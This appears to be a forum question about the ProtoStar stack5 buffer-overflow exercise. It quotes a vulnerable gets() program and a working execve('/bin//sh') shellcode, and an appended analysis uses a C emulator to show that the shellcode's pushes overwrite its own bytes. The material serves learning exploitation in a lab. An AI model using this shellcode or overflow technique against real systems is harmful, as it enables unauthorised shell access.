Hey, I'm currently doing ProtoStar-Stack5 (http://exploit-exercises.lains.space/protostar/stack5/) with the following C code:
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
    char buffer[64];

    /* gets() has no bounds check: input longer than 64 bytes runs past
       the buffer and overwrites the saved return address. */
    gets(buffer);
}
Atm I'm trying to execute this shellcode:
08048060 <_start>:
8048060: 31 c0 xor %eax,%eax
8048062: 50 push %eax
8048063: 68 2f 2f 73 68 push $0x68732f2f
8048068: 68 2f 62 69 6e push $0x6e69622f
804806d: 89 e3 mov %esp,%ebx
804806f: 89 c1 mov %eax,%ecx
8048071: 89 c2 mov %eax,%edx
8048073: b0 0b mov $0xb,%al
8048075: cd 80 int $0x80
8048077: 31 c0 xor %eax,%eax
8048079: 40 inc %eax
804807a: cd 80 int $0x80
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80
When running the overflow in gdb (gef), it executes as expected until it pushes the two strings (0x68732f2f and 0x6e69622f) onto the stack. After the second string is pushed, the assembly changes from:
mov ebx,esp
mov ecx,eax
mov edx,eax
mov al,0xb
int 0x80
to:
mov ebx,esp
mov ecx,eax
mov edx,eax
mov al,0x2f
bound ebp,QWORD PTR [ecx+0x6e]
das
das
jae 0xffffcee4
and then segfaults at bound ebp,QWORD PTR [ecx+0x6e].
My question now is why it changes and whether the change has to do with the segfault.
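The bytes in the second listing (b0 2f 62 69 6e 2f 2f 73 68) are the opcode byte of mov $0xb,%al followed by "/bin//sh", i.e. exactly the two dwords the shellcode itself pushes, stored little-endian one after the other. The C program below is an added example, not part of the original post: it emulates the stack effect of the shellcode's pushes against a simulated stack buffer so the overwrite can be reproduced offline. The layout is an assumption inferred from where "/bin//sh" lands in the post's listing (a 128-byte stack array, shellcode at offset 64, esp on entry 32 bytes past the shellcode start); the real addresses on the ProtoStar box are not given on the page.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The 28 shellcode bytes quoted in the post (execve("/bin//sh"), then exit). */
static const uint8_t SHELLCODE[] = {
    0x31, 0xc0,                         /* xor  %eax,%eax                 */
    0x50,                               /* push %eax                      */
    0x68, 0x2f, 0x2f, 0x73, 0x68,       /* push $0x68732f2f   "//sh"      */
    0x68, 0x2f, 0x62, 0x69, 0x6e,       /* push $0x6e69622f   "/bin"      */
    0x89, 0xe3,                         /* mov  %esp,%ebx                 */
    0x89, 0xc1,                         /* mov  %eax,%ecx                 */
    0x89, 0xc2,                         /* mov  %eax,%edx                 */
    0xb0, 0x0b,                         /* mov  $0xb,%al      (offset 19) */
    0xcd, 0x80,                         /* int  $0x80                     */
    0x31, 0xc0, 0x40, 0xcd, 0x80        /* xor / inc / int: exit(1)       */
};
#define SHELLCODE_LEN ((size_t)sizeof SHELLCODE)

/* Simulated stack. ASSUMPTION: 128 bytes, shellcode copied to offset 64.
   "esp" values are offsets into this array; pushes move toward offset 0. */
#define STACK_LEN 128
#define SC_OFF    64

/* Emulate a 32-bit push: esp -= 4, then store v little-endian at esp. */
static size_t push32(uint8_t *stack, size_t esp, uint32_t v)
{
    esp -= 4;
    stack[esp + 0] = (uint8_t)(v & 0xff);
    stack[esp + 1] = (uint8_t)((v >> 8) & 0xff);
    stack[esp + 2] = (uint8_t)((v >> 16) & 0xff);
    stack[esp + 3] = (uint8_t)((v >> 24) & 0xff);
    return esp;
}

/* Lay out the stack, then apply the stack effects of the shellcode's first
   four instructions (xor; push %eax; push "//sh"; push "/bin") starting from
   entry_esp. Returns how many shellcode bytes were overwritten and stores
   the offset of the first overwritten byte in *first (SHELLCODE_LEN if none). */
static int emulate_prologue(uint8_t *stack, size_t entry_esp, size_t *first)
{
    memset(stack, 0x90, STACK_LEN);             /* NOP filler everywhere else */
    memcpy(stack + SC_OFF, SHELLCODE, SHELLCODE_LEN);

    size_t esp = entry_esp;
    esp = push32(stack, esp, 0x00000000);       /* push %eax, eax is 0 here */
    esp = push32(stack, esp, 0x68732f2f);       /* "//sh"                   */
    esp = push32(stack, esp, 0x6e69622f);       /* "/bin"                   */
    (void)esp;

    int clobbered = 0;
    *first = SHELLCODE_LEN;
    for (size_t i = 0; i < SHELLCODE_LEN; i++) {
        if (stack[SC_OFF + i] != SHELLCODE[i]) {
            if (*first == SHELLCODE_LEN)
                *first = i;
            clobbered++;
        }
    }
    return clobbered;
}

static void dump(const uint8_t *stack, size_t from, size_t to)
{
    for (size_t i = from; i < to; i++)
        printf("%02x ", stack[i]);
    putchar('\n');
}

int main(void)
{
    uint8_t stack[STACK_LEN];
    size_t first;

    /* Case 1: esp on entry is 32 bytes past the start of the shellcode
       (ASSUMPTION inferred from where "/bin//sh" appears in the post). */
    int n = emulate_prologue(stack, SC_OFF + 32, &first);
    printf("entry esp = shellcode+32: %d bytes clobbered, first at offset %zu\n",
           n, first);
    printf("bytes from offset 19: ");
    dump(stack, SC_OFF + 19, SC_OFF + SHELLCODE_LEN);

    /* Case 2: esp on entry is at the start of the shellcode, so all three
       pushes land below the code instead of on top of it. */
    n = emulate_prologue(stack, SC_OFF, &first);
    printf("entry esp = shellcode start: %d bytes clobbered\n", n);
    return 0;
}
```

In case 1 the dump starting at offset 19 reads b0 2f 62 69 6e 2f 2f 73 68, the same byte sequence gdb disassembled as mov al,0x2f / bound ebp,... / das / das / jae in the post: the two string pushes landed on the shellcode's own mov $0xb,%al, int $0x80 and exit sequence. Case 2 uses the same pushes with esp already below the code and changes nothing, which is the property any fix has to establish (esp at shellcode entry must lie below the shellcode bytes, with enough room for the pushes).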